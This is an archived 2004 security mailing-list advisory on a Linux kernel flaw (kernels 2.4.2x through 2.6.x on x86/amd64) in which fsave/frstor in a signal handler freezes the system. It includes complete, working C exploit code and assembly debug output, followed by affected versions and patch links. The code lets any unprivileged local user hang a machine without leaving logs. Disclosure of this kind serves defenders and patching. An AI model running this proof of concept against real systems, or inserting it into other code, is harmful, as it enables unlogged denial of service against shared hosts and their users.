The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[EXPL] Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 21 Jun 2004 11:52:42 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [EXPL] Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code
------------------------------------------------------------------------


SUMMARY

The kernel is the most important part of the Linux operating system. It 
handles communication with the computers hardware and decides the priority 
of running programs (processes). If the kernels stops doing its job, 
everything else will too.

A bug in the Linux kernel lets a simple C program to crash the kernel, 
effectively locking the whole system. No root access is required, only 
local unprivileged access is needed.

DETAILS

Vulnerable Systems:
 * Linux kernel versions 2.4.2x through 2.6.x on x86 and amd64 systems

Immune Systems:
 * Linux kernel version 2.6.7 (latest)
 * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel)
 * Linux Kernel 2.6.4 SMP patched with staircase scheduler
 * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
 * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
 * Linux Kernel 2.4.25-gentoo-r1
 * 2.2.19-kernel

Exploit Code:
The code that crashes the kernel is provided below:
--------------------------------- Begin Code 
---------------------------------
/* --------------------
   * frstor Local Kernel exploit
   * Crashes any kernel from 2.4.18
   * to 2.6.7 because frstor in assembler 
   * inline offsets in memory by 4.
   * Original proof of concept code
   * by stian_@_nixia.no.
   * Added some stuff by lorenzo_@_gnu.org
   * and fixed the fsave line with (*fpubuf).
   * --------------------
   */
  
  /*
  ---------
  Some debugging information made
  available by stian_@_nixia.no
  ---------
  TakeDown:
          pushl   %ebp
          movl    %esp, %ebp
          subl    $136, %esp
          leal    -120(%ebp), %eax
          movl    %eax, -124(%ebp)
  #APP
          fsave -124(%ebp)
  
  #NO_APP
          subl    $4, %esp
          pushl   $1
          pushl   $.LC0
          pushl   $2
          call    write
          addl    $16, %esp
          leal    -120(%ebp), %eax
          movl    %eax, -128(%ebp)
  #APP
          frstor -128(%ebp)
  
  #NO_APP
          leave
          ret
  */
  
  #include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
  
  static void TakeDown(int ignore)
  {
   char fpubuf[108];
  // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
  __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf)); 
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }
  
  int main(int argc, char *argv[])
  {
   struct itimerval spec;
   signal(SIGALRM, TakeDown);
   spec.it_interval.tv_sec=0;
   spec.it_interval.tv_usec=100;
   spec.it_value.tv_sec=0;
   spec.it_value.tv_usec=100;
   setitimer(ITIMER_REAL, &spec, NULL);
   while(1)
    write(1, ".", 1);
  
   return 0;
  }
  // <<EOF
---------------------------------- End Code 
----------------------------------

Note: This bug is confirmed to be present when the code is compiled with 
GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel 
versions 2.4.2x and 2.6.x on x86 and amd64 systems. This code does not 
compile (makes no executable) on sparc64 sun4u TI UltraSparc II 
(BlackBird). This doesn't affect NetBSD Stable as well.

SMP systems can be compromised although a seperate instance of the program 
is needed for each CPU before the system will halt. Each instance of the 
program code will lock one CPU and this process can not be killed. If you 
have two CPUs the second instance of the program kills the entire machine.

Since this exploit only requires a local shell with no privileges, any 
user who has a shell account, whether in an ISP web hosting or others, 
will be able to completely bring down the machine with minimum effort. 
Since the kernel immediately freezes, the attack will not be logged at 
all.

Patch Availability:
The following links can be used in order to patch the kernel. The new 
Linux kernel is of course immune to this issue.

Patch for 2.4.2x Kernels, x86 and x86_64:
 * Patch for 2.4.2x, x86 -  
<http://linux.bkbits.net:8080/linux-2.4/gnupatch@40cdf6f8V7sOe5n96HA5Q7r9uDRvJQ> Bitkeeper i387.h patch x86
 * x86-64 is missing in Bitkeeper, Andr  Tomt posted patches including 
x86_64 at  <http://tomt.net/kernel/clear_fpu/>; 
http://tomt.net/kernel/clear_fpu/
   
<http://linuxreviews.org/news/2004-06-11_kernel_crash/24_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt>; http://linuxreviews.org/news/2004-06-11_kernel_crash/24_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt

Once the patch has been applied, the code can't halt the machine, although 
the process itself will consume 99% CPU usage. However, it can now be 
killed and the threat removed.

Patch for 2.6.xx Kernels, x86 and x86_64:
 * Patch for 2.6.x, x86 -  
<http://linux.bkbits.net:8080/linux-2.6/gnupatch@40cbb80fOHy9vCWmfUx3PVJBWei0Hw> Bitkeeper i387.h patch x86
 * Patch for 2.6.x, x86_64 -  
<http://linuxreviews.org/news/2004-06-11_kernel_crash/26_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt>; Bitkeeper i387.h patch x86_64
 * Both -  
<http://linuxreviews.org/news/2004-06-11_kernel_crash/26_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt>; 26_kernel_ia32-and-x86_64-fix-fpu-state.patch


ADDITIONAL INFORMATION

The information has been provided by  <mailto:[email protected]> JM.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру